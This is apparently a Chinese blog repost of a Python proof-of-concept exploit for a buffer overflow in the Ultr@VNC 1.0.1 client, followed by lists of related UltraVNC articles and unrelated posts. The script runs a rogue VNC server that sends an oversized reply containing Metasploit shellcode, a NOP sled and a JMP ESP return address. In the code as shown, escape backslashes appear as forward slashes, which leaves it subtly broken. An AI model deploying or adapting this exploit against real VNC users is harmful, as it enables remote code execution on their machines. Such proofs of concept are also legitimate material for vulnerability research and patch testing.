Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit

最新推荐文章于 2024-12-27 10:43:01 发布
转载 最新推荐文章于 2024-12-27 10:43:01 发布 · 1k 阅读 · 0
文章标签:

#buffer #server #stream #header #socket #struct

本文提供了一个针对Ultr@VNC 1.0.1版本客户端的缓冲区溢出漏洞概念验证代码(PoC),该漏洞可用于触发远程代码执行。通过构造特定的数据包并发送到VNC服务器,可以利用此漏洞执行任意代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#!/usr/bin/python

#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
#POC by Paul Haas at Redspin.com
#Tested on WinXP SP 2: Launches Calc
import socket, struct

HOST = ''                       # Localhost
PORT = 5900                     # VNC Server
BOFSZ = 1024                    # Buffer Size
HEAD = "RFB 003.006/n"          # VNC Header
MESSAGE = "Requires Ultr@VNC Authentication/n"
NOP = "/x90"                    # Standard x86 NOP
JMP = "/xE9/x1B/xFC/xFF/xFF"    # JMP To BUFF
ESP = "/xE0/x3A/xB4/x76"        # winmm.dll: JMP %esp
POP = "PASSWORD"                # RET 8

# win32_exec - CMD=calc Size=160 http://metasploit.com
SHELLCODE = /
"/x31/xc9/x83/xe9/xde/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xe1"+/
"/x7c/x05/xd9/x83/xeb/xfc/xe2/xf4/x1d/x94/x41/xd9/xe1/x7c/x8e/x9c"+/
"/xdd/xf7/x79/xdc/x99/x7d/xea/x52/xae/x64/x8e/x86/xc1/x7d/xee/x90"+/
"/x6a/x48/x8e/xd8/x0f/x4d/xc5/x40/x4d/xf8/xc5/xad/xe6/xbd/xcf/xd4"+/
"/xe0/xbe/xee/x2d/xda/x28/x21/xdd/x94/x99/x8e/x86/xc5/x7d/xee/xbf"+/
"/x6a/x70/x4e/x52/xbe/x60/x04/x32/x6a/x60/x8e/xd8/x0a/xf5/x59/xfd"+/
"/xe5/xbf/x34/x19/x85/xf7/x45/xe9/x64/xbc/x7d/xd5/x6a/x3c/x09/x52"+/
"/x91/x60/xa8/x52/x89/x74/xee/xd0/x6a/xfc/xb5/xd9/xe1/x7c/x8e/xb1"+/
"/xdd/x23/x34/x2f/x81/x2a/x8c/x21/x62/xbc/x7e/x89/x89/x8c/x8f/xdd"+/
"/xbe/x14/x9d/x27/x6b/x72/x52/x26/x06/x1f/x64/xb5/x82/x7c/x05/xd9"

#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
buff = buff+ESP+POP+JMP

#Egg = VNC Server Error Reply and Size of Reply + buff
egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff

print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
print 'POC by Paul Haas at Redspin.com'
print 'Server listening on port', PORT

#Server Loop
while(1):
       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       s.bind((HOST, PORT))
       s.listen(1)

       conn, addr = s.accept()
       print 'Connection by', addr

       conn.send(HEAD)
       data = conn.recv(12)

       conn.send(egg)
       conn.close()


 
UltraVNC 使用方法详细说明
m0_64483960的博客
04-27 2万+
UltraVNC 使用方法详细说明以及防火墙设置
vnc后台隐藏运行
weixin_34273046的博客
02-28 1929
Ultr@VNC 的使用方法 最近准备使用VNC,百度一下转载文章。留着备用 又快又实用的远程控制法宝 现在很多家庭已经拥有两台电脑,虽然方便了使用,但也带来了一些操作麻烦,要不停地换用键盘、鼠标,同样的问题也出现在了学校宿舍中。要想解决这一问题你最先想到的一定就是远程控制软件。 我们在以前的期刊中已经介绍过一些具有特殊功能的远程控制软件,...
服务器远程控制便捷工具——Ultra@VNC
weixin_30552811的博客
12-13 267
对于局域网服务器管理人员来说,要是对服务器的任何维护操作都要到服务器所在计算机的现场去进行的话,那么服务器的维护效率肯定不是很高,而且还会把网络管理人员累坏!为了有效提高服务器的维护效率,不少人都通过Windows 2003服务器中的远程桌面Web连接功能,来在其他任意可以联网的计算机中,对服务器进行各种方式的远程维护和管理。不过,通过这种方法对服务器进行远程控制,需要进行很复杂的设置;显然这种方...
Ultr@VNC编译方法
zzz_781111的专栏
07-01 961
Ultr@VNC编译方法,安装win32 sdk,安装platform sdk然后按下面设置include filesD:/PLATFORM/INCLUDEC:/Program Files/Microsoft Visual Studio/VC98/INCLUDEC:/Program Files/Microsoft Visual Studio/VC98/MFC/INCLUDE
UltraVNC:一款高层玩家使用的远程控制软件
07-09 9542
方案二: 给个思路吧:同步网盘+vnc反向连接+单方公网ip+自己编程。可以替代 teamviewer。 怎么说呢? 首先,我介绍一下自己的情况,我有一台机器需要远程控制,但是在内网,也不能通过端口映射出来。但是控制端,却有公网ip,所以,如果要控制那台内网的机器,需要利用 vnc 的反向连接功能,这不难,难的是,怎样让内网的机器知道什么时候需要主动发起反向连接。这就要有个办法来通知内网的机器。 这时就轮到同步网盘上场了,比如坚果云,syncthing,verysync,resilio,one dri..
Ultr@VNC 1.0.1源代码解析:自由软件远程控制的实现
标题:“Ultr@VNC 1.0.1源代码”所指的知识点: - VNC(Virtual Network Computing)是一种远程控制软件,它允许用户从一台计算机远程访问和控制另一台计算机。 - 该标题表明提供的是一个名为Ultr@VNC版本1.0.1...
UltraVNC_1.0.8.2_vncviewer.zip
10-18
UltraVNC_1.0.8.2_vncviewer.zip UltraVNC_1.0.8.2_vncviewer.zip UltraVNC_1.0.8.2_vncviewer.zip UltraVNC_1.0.8.2_vncviewer.zip
【UltraVNC】VNC服务端单机版制作 即UltraVNC SC (Single Click)
Best_lgx的博客
12-27 718
简单、方便、免安装、打开即用、体积小;用户点击对应连接名称即可发起连接,不用像UltraVNC Server再手动输入view端的服务器IP 和端口 (中继模式 还需多输入一个 ID号)。UltraVNC SC是一个小型(166k) UltraVNC服务器,可以定制和预配置,供客户下载。UltraVNC SC不需要安装,也不使用注册表。客户只需下载小的可执行文件,然后点击建立连接。连接由服务器发起,以允许通过客户防火墙轻松访问。
黑客攻防实战案例解析:UltraVNC安全防护策略
章节中还提到了加密传输(如Ultr@VNC的实际应用)和安全配置的重要性,比如选择合适的VNC客户端,确保只有授权用户可以连接,并且需要定期更新软件以修补已知漏洞。书中可能还会涉及如何通过IP地址管理和防火墙规则...
VNC_Windows_Server_Client.zip
05-09
Windows平台的VNC客户端和服务端安装包,安装后可远程访问、控制Windows系统,跟其他远程访问软件一样,但是VNC更轻巧、便捷。
UltraVnc 设置的一些事情
weixin_34055787的博客
11-07 983
在vncproperties.cpp里面vncProperties::ShowAdmin(BOOL show, BOOL usersettings), 里面用来启动 设置vnc server设置的页面, 然后在vncproperties.cpp 里面的 vncProperties::DialogProc(HWND hwnd, UINT uMsg, WPARAM...
UltraVNC在域环境下批量部署并进行统一的设置
weixin_45828368的博客
04-03 1903
公司办公电脑加域之后,因部门太多,每个部门所使用的软件也不尽相同,同一个部门不同岗位的人员用的软件还不一样。所以呢,封装系统也只能解决同一部门使用相同的软件的情况,公司人数少的时候可以悠哉游哉的授权安装,但是随着公司人员越来越多,从上班开始屁股基本就挨不着凳子,那么工位也就形同虚设。经过自己的摸索慢慢的也完成了部署,为了防止遗忘,就把这次部署经历记录下来,刚好也可以分享给大家。因为要在域环境下批量部署,因此最方便的也就是使用域控制器下发组策略来进行安装,只要组策略设置完毕,客户端重启后就会自动安装。
FPGA实现多路高精度AD1246数据的高速采集与接收设计方案 - SPI 指南
08-08
如何利用FPGA实现多路高精度AD1246数据的高速采集与接收设计。首先简述了AD1246的特点及其在高精度数据采集中的重要性,接着阐述了FPGA在数据采集中的优势,如并行处理能力和灵活性。然后重点讨论了三个主要的设计步骤:一是接口设计,通过Verilog代码实现了SPI主控制器模块,用于与AD1246通信;二是多路数据采集处理,通过实例化多个SPI主控制器模块来并行处理多路AD1246数据;三是高速数据缓存与处理,使用FPGA内部的Block RAM作为缓存,确保数据的有效管理和快速访问。最后总结了整个设计流程,并指出实际应用中可能需要进一步优化的地方。 适合人群:从事嵌入式系统开发、FPGA设计以及数据采集系统的工程师和技术爱好者。 使用场景及目标:适用于需要高效、高精度数据采集的应用场合,如工业自动化、医疗设备、科研仪器等领域。目标是帮助读者掌握基于FPGA的多路高精度AD1246数据采集方法,提升数据采集系统的性能。 其他说明:文中提供的Verilog代码片段展示了关键部分的具体实现细节,有助于读者理解和实践。此外,还提到了未来改进的方向,如提高采样频率和优化缓存策略等。
java调用cmd命令.pdf
08-08
java调用cmd命令
Vue.js组件中实现平滑返回页面顶部动画
08-08
资源下载链接为: https://pan.quark.cn/s/d9ef5828b597 在本文中,我们将探讨如何通过 Vue.js 实现一个带有动画效果的“回到顶部”功能。Vue.js 是一款用于构建用户界面的流行 JavaScript 框架,其组件化和响应式设计让实现这种交互功能变得十分便捷。 首先,我们来分析 HTML 代码。在这个示例中,存在一个 ID 为 back-to-top 的 div 元素,其中包含两个 span 标签,分别显示“回到”和“顶部”文字。该 div 元素绑定了 Vue.js 的 @click 事件处理器 backToTop,用于处理点击事件,同时还绑定了 v-show 指令来控制按钮的显示与隐藏。v-cloak 指令的作用是在 Vue 实例渲染完成之前隐藏该元素,避免出现闪烁现象。 CSS 部分(backTop.css)主要负责样式设计。它首先清除了一些默认的边距和填充,对 html 和 body 进行了全屏布局,并设置了相对定位。.back-to-top 类则定义了“回到顶部”按钮的样式,包括其位置、圆角、阴影、填充以及悬停时背景颜色的变化。此外,与 v-cloak 相关的 CSS 确保在 Vue 实例加载过程中隐藏该元素。每个 .page 类代表一个页面,每个页面的高度设置为 400px,用于模拟多页面的滚动效果。 接下来是 JavaScript 部分(backTop.js)。在这里,我们创建了一个 Vue 实例。实例的 el 属性指定 Vue 将挂载到的 DOM 元素(#back-to-top)。data 对象中包含三个属性:backTopShow 用于控制按钮的显示状态;backTopAllow 用于防止用户快速连续点击;backSeconds 定义了回到顶部所需的时间;showPx 则规定了滚动多少像素后显示“回到顶部”按钮。 在 V
智慧社区与楼宇管理系统:集成智能照明、安防、设备管理与可视化大屏园区数据
最新发布
08-08
智慧社区系统的构建及其各个子系统的功能。首先阐述了智能照明与楼控系统的作用,如通过智能传感器实现自动调节灯光亮度,以及对楼宇内设备的集中管理和故障预警。接着讨论了web端管理系统与智慧楼宇管理系统的应用,强调其实时监控和数据分析能力,帮助管理人员高效掌握社区运行状况。然后介绍了可视化大屏园区数据的功能,使得各项数据一目了然,提升管理透明度。此外,文中提到安防系统采用多种技术保障社区安全,并建立设备台账确保设备良好运作。最后讲述了运维管理和能源管理的重要性,利用专业系统优化资源配置,降低运营成本。文章还展示了使用Axure和RP工具制作的产品原型,便于理解和推广智慧社区理念。 适合人群:社区管理者、物业工作人员、智慧城市研究者和技术开发者。 使用场景及目标:适用于新建或改造社区项目,旨在提升社区智能化水平,增强安全性,减少能耗,改善居住环境。 其他说明:智慧社区系统的建设涉及多个领域的技术和资源整合,未来将继续探索新技术以提供更多可能。
工业自动化领域昆仑通态变频器直接控制程序及通讯协议解析
08-08
昆仑通态公司在工业自动化领域的直接控制变频器程序及其通讯技术。文章首先概述了昆仑通态的技术背景,强调其在变频器控制方面的丰富经验和技术实力。接着,重点讲解了关键技术,包括编程语言与技术、通讯协议(如Modbus、OPC)以及硬件与软件的集成。文中还列举了具体应用实例,展示了该技术在钢铁生产线中的高效应用。此外,讨论了技术的优势与面临的挑战,并展望了未来的发展趋势,指出随着人工智能和物联网技术的进步,昆仑通态将继续优化其技术方案,以适应更高的工业自动化需求。 适合人群:从事工业自动化相关工作的工程师和技术人员,尤其是对变频器控制和通讯协议感兴趣的读者。 使用场景及目标:适用于希望深入了解变频器控制技术和通讯协议的专业人士,旨在帮助他们掌握最新的工业自动化解决方案,提高生产效率和稳定性。 其他说明:本文不仅提供了理论知识,还结合实际案例进行了分析,有助于读者更好地理解和应用这些技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值